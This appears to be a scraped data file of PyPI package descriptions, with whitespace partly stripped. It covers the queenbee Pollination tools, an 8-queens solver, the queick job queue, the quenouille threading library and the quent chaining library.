directlywrite(python_package,'./pollination-honeybee-radiance')Seepollination-honeybee-radiancepluginfor a full project example.RecipeRecipeis a collection ofDAGs. EachDAGis a collection of interrelatedtasks.\nYou can use queenbee-dsl to create complex recipes with minimum code by reusing thefunctionsas templates for each task.Packaging a plugin is exactly the same as packaging a plugin.fromqueenbee_dsl.packageimportload,translate# name of the queenbee packagepython_package='daylight-factor'# load this package as Queenbee Reciperecipe=load(python_package,baked=True)# or translate and write the package as a Queenbee plugin to a folder directlytranslate(python_package,'./daylight-factor')Seedaylight factorrecipefor a full project example.How to create a queenbee-dsl packageQueenbee-dsl uses Python's standard packaging to package queenbee plugins and recipes.\nIt parses most of the data from inputs insetup.pyfile and some Queenbee specific\ninformation from__init__.pyfile. Below is an example of how these file should look\nlike.setup.py#!/usr/bin/env pythonimportsetuptools# These two class extends setup.py to install the packages as queenbee packagesfromqueenbee_dsl.packageimportPackageQBInstall,PackageQBDevelop# Read me will be mapped to readme stringswithopen(\"README.md\",\"r\")asfh:long_description=fh.read()setuptools.setup(cmdclass={'develop':PackageQBDevelop,'install':PackageQBInstall},# required - include this for queenbee packagingname='pollination-honeybee-radiance',# required - will be used for package name unless it is overwritten using __queenbee__ key in __init__.pyversion='0.1.0',# required - will be used as package tag. you can also use semantic versioningurl='https://github.com/pollination/pollination-honeybee-radiance',# optional - will be translated to homedescription='Honeybee Radiance plugin for Pollination.',# optional - will be used as package descriptionlong_description=long_description,# optional - will be translated to ReadMe content on Pollinationlong_description_content_type=\"text/markdown\",author='author_1',# optional - all the information for author and maintainers will beauthor_email='author_1@example.com',# translated to maintainers. For multiple authors use commamaintainer='maintainer_1, maintainer_2',# inside the string.maintainer_email='maintainer_1@example.come, maintainer_2@example.com',packages=setuptools.find_packages('pollination_honeybee_radiance'),# required - standard python packaging input. not used by queenbeekeywords='honeybee, radiance, ladybug-tools, daylight',# optional - will be used as keywordslicense='PolyForm Shield License 1.0.0, https://polyformproject.org/wp-content/uploads/2020/06/PolyForm-Shield-1.0.0.txt'# optional - the license link should be separated by a comma)init.pyHere is an example__init__.pyfor a plugin.__queenbee__={'name':'honeybee-radiance',# optional - new name for queenbee package. this will overwrite the Python package name'icon':'https://ladybug.tools/assets/icon.png',# optional - package icon'config':{# required for Pollination - docker information for this specific plugin'docker':{'image':'ladybugtools/honeybee-radiance:1.28.12','workdir':'/home/ladybugbot/run'}}}Here is an example__init__.pyfor a recipe.from.entryimportAnnualDaylightEntryPoint__queenbee__={'name':'annual-daylight',# optional - new name for queenbee package. this will overwrite the Python package name'icon':'https://ladybug.tools/assets/icon.png',# optional - package icon'entry_point':AnnualDaylightEntryPoint,# required - this will point queenbee to the class that should be used to start the run}"} +{"package": "queenbee-local", "pacakge-description": "queenbee-localQueenbee task provides a helper module for running queenbee recipes on a local machineInstallationpip install queenbee-localQuickStartimportqueenbee_local"} +{"package": "queenbee-pollination", "pacakge-description": "queenbee-pollinationqueenbee-pollination extendsqueenbeein order to interact with thePollination API.InstallationYou can install this as a cli tool using the following command:pip install queenbee-pollination[cli]CLI QuickStartAuthenticationThe CLI tool will authenticate to the Pollination API in one of two ways:Env VarsSet the following environment variable as your API token before running commandsQB_POLLINATION_TOKEN.Example for a bash shell:> export QB_POLLINATION_TOKEN=> queenbee pollination project simulations list --project test-project --owner ladybug-toolsQueenbee ConfigRe-use pollination auth set in your queenbee config. You can do so by using this command:> queenbee config auth add pollination YOUR_POLLINATION_API_KEYPushYou can push recipes and operators to the Pollination platform to share them with others or use them within simulations.To push a recipe calledmy-cool-recipeto Pollination platform use:> queenbee pollination push recipe path/to/my-cool-recipeYou can push a recipe or operator too a specific pollination account by specifying the--ownerflag. You can overwrite the resource's tag by using the--tagflag. Here is an example of pushing thehoneybee-radianceoperator to theladybug-toolsaccount and specifying a tag ofv0.0.0.> queenbee pollination push operator ../garden/operators/honeybee-radiance --tag v0.0.0 --owner ladybug-toolsPullYou can pull recipes and operators from Pollination onto your machine by using thepullcommands.You can pull the latest version ofmy-cool-recipefrom your pollination account by running:> queenbee pollination pull recipe my-cool-recipeYou can pull thehoneybee-radianceoperator from theladybug-toolsaccount and tagv0.0.0by running:> queenbee pollination pull operator honeybee-radiance --owner ladybug-tools --tag v0.0.0Note:You can specify a folder to download the recipe/operator to by specifying the--pathoption flag.ProjectsThe project section of the CLI lets users upload files to a project and schedule simulations.FolderA user can upload or delete files in a project folder. To do so use the following commands:UploadYou can upload artifacts to a project calledtest-projectectby using this command:> queenbee pollination project upload path/to/file/or/folder --project test-projectectYou can upload artifacts to a project belonging to another user or org:> queenbee pollination project upload path/to/file/or/folder --project test-projectect --owner ladybug-toolsDeleteYou can delete all files in a project folder:> queenbee pollination project delete --project test-projectectYou can delete specific files in a project folder:> queenbee pollination project delete --project test-projectect --path some/subpath/to/a/fileSimulationsFor a given project you can list, submit or download simulations.List> queenbee pollination project simulation list -p test-projectectSubmitYou can submit a simulation without needing to specify any inputs (if the simulation does not require any!). The recipe to be used is specified in the following format{owner}/{recipe-name}:{tag}:> queenbee pollination project simulation submit chuck/first-test:0.0.1 -p demoIf you want to specify inputs you can point to an inputs file (jsonoryaml) which must represent aQueenbee Workflow Argumentobject.> queenbee pollination project simulation submit ladybug-tools/daylight-factor:latest --project demo --inputs path/to/inputs.ymlDownloadOnce a simulation is complete you can download all inputs, outputs and logs to you machine. Here is an example downloading data from a simulation with an ID of22c75263-c8ba-42d0-a1b8-bd3107eb6b51from a project with namedemoby using the following command:> queenbee pollination project simulation download --project demo --id 22c75263-c8ba-42d0-a1b8-bd3107eb6b51"} +{"package": "queenin", "pacakge-description": "No description available on PyPI."} +{"package": "queen-pkg", "pacakge-description": "\u00ff\u00feH\\x00i\\x00 \\x00\n\\x00\n\\x00T\\x00h\\x00i\\x00s\\x00 \\x00i\\x00s\\x00 \\x00t\\x00r\\x00i\\x00a\\x00l\\x00.\\x00"} +{"package": "queens8", "pacakge-description": "queens8 Package 0.1.2last change 25-Apr-2022Introduction to the n Queens and 8 Queens problem.In the 19th century the n Queens puzzle was formulated. The aim of the puzzle was to place\nn Chess Queens on a n x n chessboard such that no Queen attacks any other Queen. That is every row, every\ncolumn and every diagonal has no more than one of the n Queens placed in that row, column or diagonal.In 1848 Chess Master Max Bezzel proposed the problem for n=8, the Chess Board we are all familiar with.\nIn 1850 Franz Nauck extended the problem to other n x n Chess boards, as well as publish soloutions to the 8 x 8\nvariant. Many mathematicians of the time worked on this, including the esteemed Karl Friedrich Gauss.With the advent of structured progamming Edsger Dijikstra wrote a program to solve this problem for n=8, with a method\nknown as depth first backtracking. The Dijikstra solution also had an elegant method of charaterizing the diagonals.In his program the user chooses which column the Queen on the first row occupies and the program looks for the first\nsolution in placing the other 7 Queens.Column NumberChess Notation1Queens Rook 12Queens Knight 13Queens Bishop 14Queen 15King 16Kings Bishop 17Kings Knight 18Kings Rook 1SymmetryWhen you run this the careful observer will notice the solutions 1 and 8 are really the same with\nthere only being a rotation of the board between them. You might also observe 2 and 6 are the same\nwith a rotation between them.A fundamental solution is the set of a solution with all symmetric solutions to that solution. A symmetric\nsolution is either a rotation or a reflection. There is one solution which is exactly equal to it's reflection,\nso it has no reflections.There are three counter clockwise rotations, that of 90, 180 and 270 degrees.A horizontal reflection is a relection around the line which\nlies between the King and Queen columns. A vertical reflection is around the line between the 4th and 5th rows.\nThere are also reflections around the longest up diagonal and the longest down diagonal. Both of these diagonal\nreflections together are a reflection about the center point of the board.Any composition of these operations is again another symmetry.\nWe keep putting new ones in until there are no new symmetries.The Dijikstra Wirth algorithm.The Dijikstra algorithm has a set of flags one for every row, every column, every Up Diagonal and every Down Diagonal.\nThis make 8 rows, 8 columns, 15 Up Diagonals and 15 Down diagonals. The Up Diagonals are characterized by K = Row + Column.\nK characterizes the diagonal with K in {2 .. 16}. The DownDiagonals are characterized by K = Row - Column. K\ncharacterizes the diagonal with K in {-7 .. 7}. The diagonal flags (as well as row and column) are lists of flags. The\ndiagonal are lists of length 17. The negative indexes for Down Diagonals work well with Python these being the distance from the\nend of the list.This package has 4 different functions.This package has 4 different functions which are sellected by menu:The fundamental Dijikstra algorithm with a Graphics like board display.A search for all fundamental solutions, that is pruning symmetries.The Dijikstra algorithm showing the board and all symmetrical boards.Showing which Dijikstra soloutiions are symmetric to each other as sets.The Pseudo graphical board display.The board is shown by using tkinter. The root frame contains 8 frames, each of which is a row.\nEach row is 8 characters. The Empty square is a Unicode '\\u3000' because an ascii space is not\nsized right. The color of the square is the background color. White Queens '\\u2665' are queens\non black squares and Black Queens '\\u265b' are placed on white squares for good contrasts. An example of\nboard for 1 and 8 are in the section labeled symmetry. The board or boards\nremain until the \"Enter to Proceed!\" is replied to. Then the boards are destroyed.Installing Queens8.The simplest method : pip install queens8Running Queens8.#!python\n\nfrom queens8 import Queens8\n\nQueens8.Go()Queens8 will then prompt:A : The orginal Dijkstra and Wirth solution to the 8 queens problem.\nB : Do all solutions with no symmetries\nC : Like Queens8 only show the symmetries too\nE : Of the 8 returned by Queens8 as equivalence sets (no graphics)\nQ : To Quit \nX : Same as Q\nselect:qA Q or an X followed by enter will exit queens8.An A or a will prompt for a column on row 1 to place the first queen. All the steps in\nthe depth first backtracking search will be displayed. The final board will be displayed also.On which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:5\n 1: Place Queen 1 on Row 5\n 2: Place Queen 2 on Row 1\n 3: Place Queen 3 on Row 4\n 4: Place Queen 4 on Row 6\n 5: Place Queen 5 on Row 3\n 5: Take Queen 5 from row 3\n 7: Place Queen 5 on Row 8\n 8: Place Queen 6 on Row 2\n 9: Place Queen 7 on Row 7\n 10: Place Queen 8 on Row 3\n2 6 8 3 1 4 7 5 \nEnter to Proceed\nOn which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:0The B entry shows all 12 fundamental solutions. Each board representing all\nsymmetries. This prompts for the choice to see the 12 boards or for a text line\nshowing each column for each row for each solution.select:b\nDisplay Queens Y or N?y\nNumber of Distinct Solutions = 12 Total Solutions = 92\nEnter to Proceed!The C entry is like the A entry, except that the board and all symmetric boards\nare displayed!select:c\nOn which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:5\nEnter to Continue\nOn which row do you want the first Queen?\nvalid entries an in range 1..8\nenter any other integer to halt.\n?:0The D entry shows for for the Dijkstra solutions, which ones are really the same\nfundamental solutions.select:e\n{1, 8}\n{2, 6}\n{3}\n{4}\n{5}\n{7}For each of the 8 solutions a set of all symmetric solutions is made. The program\nlooks for which one are disjoint, O(n^2^) process.Look For:This subject is also discussed in a book I have written. I will update this 'README.md'\nwhen the book is published."} +{"package": "queensbarry", "pacakge-description": "No description available on PyPI."} +{"package": "que_es", "pacakge-description": "No description available on PyPI."} +{"package": "queick", "pacakge-description": "QueickA simple inmemory job-queue manager for Python.FeatureWritten in Python only standard librariesJob-queue managerwithout redisWorking for low-spec machinesRetryRetry on network availableSchedulingInstallationPython version >= 3.6 is required.pip install queickUsageFirst, launch queick worker.$ queickSecond, prepare a job file (jobfunc.py) and an application (test.py).# jobfunc.pyimporttimedeffunction(arg):time.sleep(1)print(arg)# test.pyfromqueickimportJobQueuefromjobfuncimportfunctionfromtimeimporttimeq=JobQueue()q.enqueue(function,args=(\"hello\",))q.enqueue_at(time()+5,function,args=(\"world\",))# Run after 5 secondsst=SchedulingTime()st.every(minutes=1).starting_from(time.time()+10)q.cron(st,function,args=(1,2,))# Run after 10 seconds and every 1 minuteThird, run the application.$ python test.pyRetry on network availableJobs inside thefailed queuewill be dequeued when the network status changes from disconnected to connected.Some setups are needed to use the retry mode. First, launch queick worker with --ping-host options (details below).$ queick --ping-host asmsuechan.com # Please prepare your own ping server, do not use this.Second, pass an option to the method.q.enqueue(function,args=(\"hello\",),retry_on_network_available=True)OptionsThere are some options for queick worker.namedefaultdescription-debugFalseif set, detailed logs will be shown--ping-hostNonehostname for NetworkWatcher to check if the machine has the internet connection--ping-port80port number for NetworkWatcher--log-filepathNonelogfile to save all the worker logAn example usage is below:$ queick -debug --ping-host asmsuechan.comTestingUnit test:$ python -m unittestIntegration test:$ docker build -t queick-test .\n$ docker run --rm -it queick-test:latestDevelopmentBuild queick for development.$ python setup.py developDeploymentDeployed athttps://pypi.org/project/queick/.$ python setup.py sdist\n$ twine upload dist/*"} +{"package": "quelfilm-chatbot-app", "pacakge-description": "No description available on PyPI."} +{"package": "quenouille", "pacakge-description": "QuenouilleA library of multithreaded iterator workflows for python.It is typically used to iterate over lazy streams without overflowing memory, all while respecting group parallelism constraints and throttling, e.g. when downloading massive amounts of urls from the web concurrently.It is mainly used by theminetpython library and CLI tool to power its downloaders and crawlers.InstallationYou can installquenouillewith pip using the following command:pip install quenouilleUsageimap, imap_unorderedThreadPoolExecutor#.imap, #.imap_unordered#.shutdownNamedLocksMiscellaneous notesThe None groupParallelism > workersCallable parallelism guaranteesParallelism vs. throttlingAdding entropy to throttleCaveats regarding exception raisingCaveats of using imap with queuesimap, imap_unorderedFunction lazily consuming an iterable and applying the desired function over the yielded items in a multithreaded fashion.This function is also able to respect group constraints regarding parallelism and throttling: for instance, if you need to download urls in a multithreaded fashion and need to ensure that you won't hit the same domain more than twice at the same time, this function can be given proper settings to ensure the desired behavior.The same can be said if you need to make sure to wait for a certain amount of time between two hits on the same domain by using this function's throttling.Finally note that this function comes in two flavors:imap_unordered, which will output processed items as soon as they are done, andimap, which will output items in the same order as the input, at the price of slightly worse performance and an increased memory footprint that depends on the number of items that have been processed before the next item can be yielded.importcsvfromquenouilleimportimap,imap_unordered# Reading urls lazily from a CSV file using a generator:defurls():withopen('urls.csv')asf:reader=csv.DictReader(f)forlineinreader:yieldline['url']# Defining some functionsdeffetch(url):# ... e.g. use urllib3 to download the url# remember this function must be threadsafereturnhtmldefget_domain_name(url):# ... e.g. use ural to extract domain name from urlreturndomain_name# Performing 10 requests at a time:forhtmlinimap(urls(),fetch,10):print(html)# Ouputting results as soon as possible (in arbitrary order)forhtmlinimap_unordered(urls(),fetch,10):print(html)# Ensuring we don't hit the same domain more that twice at a timeforhtmlinimap(urls(),fetch,10,key=get_domain_name,parallelism=2):print(html)# Waiting 5 seconds between each request on a same domainforhtmlinimap(urls(),fetch,10,key=get_domain_name,throttle=5):print(html)# Throttle time depending on domaindefthrottle(group,item,result):ifgroup=='lemonde.fr':return10return2forhtmlinimap(urls(),fetch,10,key=get_domain_name,throttle=throttle):print(html)# Only load 10 urls into memory when attempting to find next suitable jobforhtmlinimap(urls(),fetch,10,key=get_domain_name,throttle=5,buffer_size=10):print(html)Argumentsiterable(iterable): Any python iterable.func(callable): Function used to perform the desired tasks. The function takes an item yielded by the given iterable as single argument. Note that since this function will be dispatched in worker threads, so you should ensure it is thread-safe.threads(int, optional): Maximum number of threads to use. Defaults tomin(32, os.cpu_count() + 1). Note that it can be0, in which case no threads will be used and everything will run synchronously (this can be useful for debugging or to avoid duplicating code sometimes).key(callable, optional): Function returning to which \"group\" a given item is supposed to belong. This will be used to ensure maximum parallelism is respected.parallelism(int or callable, optional)[1]: Number of threads allowed to work on a same group at once. Can also be a function taking a group and returning its parallelism.buffer_size(int, optional)[1024]: Maximum number of items the function will buffer into memory while attempting to find an item that can be passed to a worker immediately, all while respecting throttling and group parallelism.throttle(int or float or callable, optional): Optional throttle time, in seconds, to wait before processing the next item of a given group. Can also be a function taking last group, item and result and returning next throttle time for this group.block(bool, optional)[False]: Whether to block when using thegetmethod of the given queue.panic(callable, optional): Function that will be called when the process has errored. Useful to unblock some functions and avoid deadlock in specific situations. Note that this function will not be called when synchronous (i.e. when not using additional threads).initializer(callable, optional): Function to run at the start of each thread worker. Can be useful to setupthread-local data, for instance. Remember this function must be threadsafe and should not block because the thread pool will wait for each thread to be correctly booted before being able to proceed. If one of the function calls fails, the thread pool will raise aquenouille.exceptions.BrokenThreadPoolerror and terminate immediately.initargs(iterable, optional): Arguments to pass to theinitializerfunction.wait(bool, optional)[True]: Whether to join worker threads, i.e. wait for them to end, when shutting down the executor. Set this toFalseif you need to go on quickly without waiting for your worker threads to end when cleaning up the executor's resources. Just note that if you spawn other thread-intensive tasks or other executors afterwards in rapid succession, you might start too many threads at once.daemonic(bool, optional)[False]: whether to spawn daemonic worker. If your worker are daemonic, the interpreter will not wait for them to end when exiting. This can be useful, combined towait=False, for instance, if you want your program to exit as soon as hitting ctrl+C (you might want to avoid this if your threads need to cleanup things on exit as they will be abruptly shut down).Using a queue rather than an iterableIf you need to add new items to process as a result of performing tasks (when designing a web crawler for instance, where each downloaded page will yield new pages to explore further down), know that theimapandimap_unorderedfunction also accepts queues as input:fromqueueimportQueuefromquenouilleimportimapjob_queue=Queue()job_queue.put(1)# Enqueuing new jobs in the workerdefworker(i):ifi<3:job_queue.put(i+1)returni*2list(imap(job_queue,worker,2))>>>[2,4,6]# Enqueuing new jobs while iterating over resultsjob_queue=Queue()job_queue.put(1)results=[]foriinimap(job_queue,worker,2):ifi<5:job_queue.put((i/2)+1)results.append(i)results>>>[2,4,6]Note thatimapwill only run until the queue is fully drained. So if you decide to add more items afterwards, this is not the function's concern anymore.ThreadPoolExecutorIf you need to runimaporimap_unorderedmultiple times in succession while keeping the same thread pool up and running, you can also directly use quenouille'sThreadPoolExecutorlike so:fromquenouilleimportThreadPoolExecutor# Using it as a context manager:withThreadPoolExecutor(max_workers=4)asexecutor:foriinexecutor.imap(range(10),worker):print(i)forjinexecutor.imap_unordered(range(10),worker):print(j)# Or if you prefer shutting down the executor explicitly:executor=ThreadPoolExecutor()executor.imap(range(10),worker)executor.shutdown(wait=False)Note that your throttling state is kept between multipleimapandimap_unorderedcalls so you don't end up perform some tasks too soon. But keep in mind this state is tied to thekeyfunction you provide to remain consistent, so if you change the usedkey, the throttling state will be reset.Argumentsmax_workers(int, optional): Maximum number of threads to use. Defaults tomin(32, os.cpu_count() + 1). Note that it can be0, in which case no threads will be used and everything will run synchronously (this can be useful for debugging or to avoid duplicating code sometimes).initializer(callable, optional): Function to run at the start of each thread worker. Can be useful to setupthread-local data, for instance. Remember this function must be threadsafe and should not block because the thread pool will wait for each thread to be correctly booted before being able to proceed. If one of the function calls fails, the thread pool will raise aquenouille.exceptions.BrokenThreadPoolerror and terminate immediately.initargs(iterable, optional): Arguments to pass to theinitializerfunction.wait(bool, optional)[True]: Whether to join worker threads, i.e. wait for them to end, when closing the executor. Set this toFalseif you need to go on quickly without waiting for your worker threads to end when cleaning up the executor's resources. Just note that if you spawn other thread-intensive tasks or other executors afterwards in rapid succession, you might start too many threads at once.daemonic(bool, optional)[False]: whether to spawn daemonic worker. If your worker are daemonic, the interpreter will not wait for them to end when exiting. This can be useful, combined towait=False, for instance, if you want your program to exit as soon as hitting ctrl+C (you might want to avoid this if your threads need to cleanup things on exit as they will be abruptly shut down).#.imap, #.imap_unorderedBasically the same as describedherewith the following arguments:iterable(iterable): Any python iterable.func(callable): Function used to perform the desired tasks. The function takes an item yielded by the given iterable as single argument. Note that since this function will be dispatched in worker threads, so you should ensure it is thread-safe.key(callable, optional): Function returning to which \"group\" a given item is supposed to belong. This will be used to ensure maximum parallelism is respected.parallelism(int or callable, optional)[1]: Number of threads allowed to work on a same group at once. Can also be a function taking a group and returning its parallelism.buffer_size(int, optional)[1024]: Maximum number of items the function will buffer into memory while attempting to find an item that can be passed to a worker immediately, all while respecting throttling and group parallelism.throttle(int or float or callable, optional): Optional throttle time, in seconds, to wait before processing the next item of a given group. Can also be a function taking last group, item and result and returning next throttle time for this group.block(bool, optional)[False]: Whether to block when using thegetmethod of the given queue.panic(callable, optional): Function that will be called when the process has errored. Useful to unblock some functions and avoid deadlock in specific situations. Note that this function will not be called when synchronous (i.e. when not using additional threads).#.shutdownMethod used to explicitly shutdown the executor.Argumentswait(bool, optional)[True]: Whether to join worker threads, i.e. wait for them to end, when shutting down the executor. Set this toFalseif you need to go on quickly without waiting for your worker threads to end when cleaning up the executor's resources. Just note that if you spawn other thread-intensive tasks or other executors afterwards in rapid succession, you might start too many threads at once.NamedLocksA weakref dictionary of locks useful to make some tasks based on keys threadsafe, e.g. if you need to ensure that two threads will not be writing to the same file at once.fromquenouilleimportNamedLockslocks=NamedLocks()defworker(filename):withlocks[filename]:withopen(filename,'a+')asf:f.write('hello\\n')Miscellaneous notesThe None groupTheimapfunctions consider theNonegroup (this can happen if yourkeyfunction returnsNone) as special and will always consider the attached items can be processed right away without parallelism constraints nor throttle.Withoutkey, all items are considered as belonging to theNonegroup.Parallelism > workersIf you setparallelismto10and only allocate5threads to perform your tasks, it should be obvious that the actual parallelism will never reach10.quenouillewon't warn you of this because it might be convenient not to give this too much thought and has not much consequence, but keep this in mind.Callable parallelism guaranteesIf you decide to pass a function to declare a custom parallelism for each group rather than a global fixed one, know that the function will be called each timequenouillehas to make a decision regarding the next items to enqueue so that we don't use any memory to record the information.This means that you should guarantee that the given function is idempotent and will always return the same parallelism for a given group if you don't want to risk a deadlock.Parallelism vs. throttlingIf a group is being trottled, it should be obvious thatquenouillewon't perform more than one single task for this group at once, so itsparallelismis in fact1, in spite of other settings.This does not mean thatparallelismfor some groups andthrottlefor others is impossible. This can be achieved through callables.Adding entropy to throttleYou can understand the callablethrottlekwarg as \"what's the minimum time the next job from this group should wait before firing up\". This means that if you need to add entropy to the throttle time, you can indeed make this function work with randomness like so:fromrandomimportrandom# Waiting 5 + (between 0 and 2) secondsdefthrottle(group,item,result):return5+(2*random())Caveats regarding exception raisingDeferred generator usage exception deadlocksIf you consume a generator returned byimap/imap_unorderedsomewhere else than where you created it, you may end up in a deadlock if you raise an exception.This is not important when usingdaemonic=Truebut you might stumble upon segfaults on exit because of python reasons beyond my control.# Safeforiteminimap(...):raiseRuntimeError# Not safeit=imap(...)foriteminit:raiseRuntimeErrorIf you really want to do that, because you don't want to use theThreadPoolExecutorcontext manager, you can try using the experimentalexcepthookkwarg:# Probably safeit=imap(...,excepthook=True)foriteminit:raiseRuntimeErrorCaveats of using imap with queuesTypical deadlocksEven ifimapcan process an input queue, you should avoid to find yourself in a situation where adding to the queue might block execution if you don't want to end in a deadlock. It can be easy to footgun yourself if your queue has amaxsize, for instance:fromqueueimportQueuefromquenouilleimportimapjob_queue=Queue(maxsize=2)job_queue.put(1)foriinimap(job_queue,worker):ifi<2:job_queue.put(2)job_queue.put(3)# This will put you in a deadlock because this will block# because of the queue `maxsize` set to 2job_queue.put(4)print(i)Design choicesTo enable you to add items to the queue in the loop body and so it can safely detect when your queue is drained without race condition,quenouilleacknowledges that a task is finished only after what you execute in the loop body is done.This means that sometimes it might be more performant to only add items to the queue from the worker functions rather than from the loop body.queue.task_doneFor now,quenouilledoes not callqueue.task_donefor you, so this remains your responsability, if you want to be able to callqueue.joindown the line."} +{"package": "quent", "pacakge-description": "QuentYet Another Chain Interface.Installationpip install quentTable of ContentsIntroductionReal World ExampleDetails & ExamplesLiteral ValuesCustom Arguments (args,kwargs,Ellipsis)Flow ModifiersChain Template / ReuseChain NestingPipe SyntaxSafety CallbacksComparisonsIteratorsContextsAPICoreexcept,finallyConditionalsCascadeDirect Attribute AccessImportant NotesSuggestions and contributions are more than welcome.IntroductionQuent is anenhanced,chain interfaceimplementation for\nPython, designed to handle coroutines transparently. The interface and usage of Quent remains exactly the same,\nwhether you feed it synchronous or asynchronous objects - it can handle almost any use case.Every documented API supports both regular functions and coroutines. It will work the exact same way as with a regular\nfunction. Quent automatically awaits any coroutines, even a coroutine that the function passed to.foreach()may\nreturn.Quent is written in C (using Cython) to minimize it's overhead as much as possible.As a basic example, take this function:asyncdefhandle_request(id):data=awaitfetch_data(id)data=validate_data(data)data=normalize_data(data)returnawaitsend_data(data)It uses intermediate variables that only serve to make to code more readable, as opposed to:asyncdefhandle_request(id):returnawaitsend_data(normalize_data(validate_data(awaitfetch_data(id))))With Quent, we can chain these operations:fromquentimportChaindefhandle_request(id):returnChain(fetch_data,id).then(validate_data).then(normalize_data).then(send_data).run()Upon evaluation (calling.run()), if an awaitable object is detected, Quent wraps it in a Task and returns it.\nThe task is automatically scheduled for execution and the chain evaluation continues within the task.\nAs Task objects need not beawait-ed in order to run, you may or may notawaitit, depending on your needs.BesidesChain, Quent provides theCascadeclass which implements thefluent interface.Quent aims to provide all the necessary tools to handle every use case.\nSee the full capabilities of Quent in theAPI Section.Real World ExampleThis snippet is taken from a thin Redis wrapper I wrote, which supports both the sync and async versions\nofrediswithout having a separate implementation for the async version.defflush(self)->Any|Coroutine:\"\"\" Execute the current pipeline and return the results, excludingthe results of inline 'expire' commands.\"\"\"pipe=self.r.pipeline(transaction=self.transaction)# this applies a bunch of Redis operations onto the `pipe` object.self.apply_operations(pipe)return(Chain(pipe.execute,raise_on_error=True).then(self.remove_ignored_commands).finally_(pipe.reset,...).run())Once the chain runs, it will execute the pipeline commands, remove the unwanted results, and return the rest\nof them. Finally, it will reset thepipeobject. Any function passed to.finally_()willalwaysbe invoked,\neven if an exception has been raised during the execution of the chain. The purpose of the...here is explained\nin theEllipsissection.pipe.executeandpipe.resetare both performing a network request to Redis, and in the case of anasyncRedis\nobject - are coroutines and would have to be awaited.\nNotice that I return without an explicitawait- if the user of this wrapper has initialized the class with an\nasyncRedisinstance, they will know that they need toawaitit. This allows me to focus on the actual logic,\nwithout caring aboutsyncvsasync.Some would say that this pattern can cause unexpected behavior, since it isn't clear when it\nwill return a Task or not. I see it no differently than any undocumented code - with a proper\nand clear documentation (be it an external documentation or just a simple docstring), there shouldn't be\nany trulyunexpectedbehavior (barring any unknown bugs).Details & ExamplesLiteral ValuesYou don't have to pass a callable as a chain item - literal values works just as well.Chain(fetch_data,id).then(True).run()will executefetch_data(id), and then returnTrue.Custom ArgumentsYou may provideargsorkwargsto a chain item - by doing so, Quent assumes that the item is a callable\nand will evaluate it with the provided arguments, instead of evaluating it with the current value.Chain(fetch_data,id).then(fetch_data,another_id,password=password).run()will executefetch_data(id), and thenfetch_data(another_id, password=password).EllipsisTheEllipsis/...is a special case - if the first argument formostfunctions that register a chain item\nor a callback is...,\nthe item will be evaluated without any arguments.Chain(fetch_data,id).then(do_something,...).run()will executefetch_data(id), and thendo_something().Flow ModifiersWhile the default operation of a chain is to, well, chain operations (using.then()), there are cases where you may\nwant to break out of this flow. For this,Chainprovides the functions.root()and.ignore().\nThey both behave like.then(), but with a small difference:.root()evaluates the item using the root value, instead of the current value..ignore()evaluates the item with the current value but will not propagate its result forwards.There is also a.root_ignore()which is the combination of.root()and.ignore().Reusing A ChainYou may reuse a chain as many times as you wish.chain=Chain(fetch_data,id).then(validate_data).then(normalize_data).then(send_data)chain.run()chain.run()...There are many cases where you may need to apply the same sequence of operations but with different inputs. Take our\nprevious example:Chain(fetch_data,id).then(validate_data).then(normalize_data).then(send_data).run()Instead, we can create a template chain and reuse it, passing different values to.run():handle_data=Chain().then(validate_data).then(normalize_data).then(send_data)foridinlist_of_ids:handle_data.run(fetch_data,id)Re-using aChainobject will significantly reduce its overhead, as most of the performance hit is due\nto the creation of a newChaininstance. Nonetheless, the performance hit is negligible and not worth to sacrifice\nreadability for. So unless it makes sense (or you need to really squeeze out performance),\nit's better to create a newChaininstance.Nesting A ChainYou can nest aChainobject within anotherChainobject:Chain(fetch_data,id).then(Chain().then(validate_data).then(normalize_data)).then(send_data).run()A nested chain must always be a template chain (i.e. initialized without arguments).A nested chain will be evaluated with the current value of the parent chain passed to its.run()method.Pipe SyntaxPipe syntax is supported:fromquentimportChain,run(Chain(fetch_data)|process_data|normalize_data|send_data).run()Chain(fetch_data)|process_data|normalize_data|send_data|run()You can also usePipewith Quent:frompipeimportwhereChain(get_items).then(where(lambdaitem:item.is_valid()))Chain(get_items)|where(lambdaitem:item.is_valid())Safety CallbacksThe usage ofexceptandfinallyis supported:Chain(open('')).then(do_something_with_file).finally_(lambdaf:f.close())Read more about it inCallbacks.ComparisonsMost basic comparison operations are supported:Chain(get_key).in_(list_of_keys)# == get_key() in list_of_keysSee the full list of operations inConditionals.IteratorsYou can easily iterate over the result of something:Chain(fetch_keys).foreach(do_something_with_key)The full details of.foreach()are explainedhere.ContextsYou can execute a function (or do quite anything you want) inside a context:Chain(get_lock,id).with_(fetch_data,id)The full details of.with_()are explainedhere.APIValue EvaluationMost of the methods in the following section receivesvalue,args, andkwargs. Unless explicitly told otherwise,\nthe evaluation ofvaluein all of those methods is roughly equivalent to:ifargs[0]isEllipsis:returnvalue()elifargsorkwargs:returnvalue(*args,**kwargs)elifcallable(value):returnvalue(current_value)else:returnvalueTheevaluate_valuefunction contains the full evaluation logic.Core__init__(value: Any = None, *args, **kwargs)Creates a new chain withvalueas the chain's root item.valuecan be anything - a literal value,\na function, a class, etc.\nIfargsorkwargsare provided,valueis assumed to be a callable and will be evaluated with those\narguments. Otherwise, a check is performed to determine whethervalueis a callable. If it is, it is\ncalled without any arguments.Not passing a value will create a template chain (see:Reusing A Chain). You can still normally use\nit, but then you must call.run()with a value (see the next section).A few examples:Chain(42)Chain(fn,True)Chain(cls,name='foo')Chain(lambdav:v*10,4.2)run(value: Any = None, *args, **kwargs) -> Any | asyncio.TaskEvaluates the chain and returns the result, or a Task if there are any coroutines in the chain.If the chain is a template chain (initialized without a value), you must call.run()with a value, which will act\nas the root item of the chain.Conversely, if.run()is called with a value and the chain is a non-template chain, then an exception will be raised.\nThe only case where you can both create a template chain and run it without a value is for theCascadeclass,\nwhich is documented below inCascade - Void Mode.Similarly to the examples above,Chain().run(42)Chain().run(fn,True)Chain().run(cls,name='foo')Chain().run(lambdav:v*10,2)then(value: Any, *args, **kwargs) -> ChainAddsvalueto the chain as a chain item.valuecan be anything - a literal value, a function, a class, etc.Returns theevaluationofvalue.This is the main and default way of adding items to the chain.(see:Ellipsisif you need to invokevaluewithout 